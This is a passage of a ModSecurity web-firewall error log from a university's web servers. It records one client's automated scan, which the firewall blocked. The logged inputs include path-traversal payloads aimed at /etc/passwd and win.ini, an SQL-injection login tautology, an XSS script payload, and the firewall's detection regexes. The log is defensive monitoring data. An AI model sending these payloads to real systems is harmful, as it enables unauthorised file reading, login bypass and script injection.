"ZO13S8Co-f0AAAdOeS8AAAAS"]
[Tue Aug 29 11:42:51.410493 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAdlvdQAAAAl"]
[Tue Aug 29 11:42:51.510269 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAd4aywAAAAj"]
[Tue Aug 29 11:42:52.371492 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAbo-e0AAAAi"]
[Tue Aug 29 11:42:52.382462 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAdQ3iUAAAAV"]
[Tue Aug 29 11:42:52.386517 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAdb7mgAAAAb"]
[Tue Aug 29 11:42:52.386920 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAdftUMAAAAG"]
[Tue Aug 29 11:42:52.393255 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAbo-e4AAAAi"]
[Tue Aug 29 11:42:53.360109 2023] [:error] [pid 1960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAeoA-UAAAAT"]
[Tue Aug 29 11:42:53.367591 2023] [:error] [pid 1921] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAeB1pcAAAAv"]
[Tue Aug 29 11:42:53.371247 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAd4azAAAAAj"]
[Tue Aug 29 11:42:53.380454 2023] [:error] [pid 1919] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAd-F0UAAAAt"]
[Tue Aug 29 11:42:53.385430 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAdSZOEAAAAX"]
[Tue Aug 29 11:42:53.390969 2023] [:error] [pid 1921] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TcCo-f0AAAeB1pgAAAAv"]
[Tue Aug 29 11:42:53.397595 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAd2324AAAAI"]
[Tue Aug 29 11:42:53.412136 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAc920YAAAAD"]
[Tue Aug 29 11:42:53.416340 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAARpg3AAAAAU"]
[Tue Aug 29 11:42:53.420391 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAeX1CMAAAAK"]
[Tue Aug 29 11:42:53.420430 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAc@caMAAAAL"]
[Tue Aug 29 11:42:54.376758 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAdOeTUAAAAS"]
[Tue Aug 29 11:42:54.385880 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAc920cAAAAD"]
[Tue Aug 29 11:42:54.406250 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAdTBCYAAAAY"]
[Tue Aug 29 11:42:54.412560 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAeYby8AAAAB"]
[Tue Aug 29 11:42:54.451512 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAdftUgAAAAG"]
[Tue Aug 29 11:42:54.454366 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAd233AAAAAI"]
[Tue Aug 29 11:42:54.460246 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAQSW3MAAAA0"]
[Tue Aug 29 11:42:54.465533 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAd4azMAAAAj"]
[Tue Aug 29 11:42:54.467345 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAdOeTcAAAAS"]
[Tue Aug 29 11:42:54.528977 2023] [:error] [pid 1898] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAdqbFYAAAAR"]
[Tue Aug 29 11:42:55.375988 2023] [:error] [pid 1960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13T8Co-f0AAAeoA-oAAAAT"]
[Tue Aug 29 11:42:55.445182 2023] [:error] [pid 1914] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13T8Co-f0AAAd64SMAAAAp"]
[Tue Aug 29 11:42:56.377731 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13UMCo-f0AAAdQ3iwAAAAV"]
[Tue Aug 29 11:42:56.414027 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13UMCo-f0AAAeX1CsAAAAK"]
[Tue Aug 29 11:42:57.393381 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAd233QAAAAI"]
[Tue Aug 29 11:42:57.435921 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAeChY4AAAAw"]
[Tue Aug 29 11:42:57.451830 2023] [:error] [pid 1914] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAd64SYAAAAp"]
[Tue Aug 29 11:42:57.456166 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAd9UNwAAAAr"]
[Tue Aug 29 11:42:57.456185 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAdECcIAAAAW"]
[Tue Aug 29 11:42:58.384707 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UsCo-f0AAAd9UN0AAAAr"]
[Tue Aug 29 11:42:59.515512 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAdUc4EAAAAZ"]
[Tue Aug 29 11:42:59.687919 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAXNuYIAAAAg"]
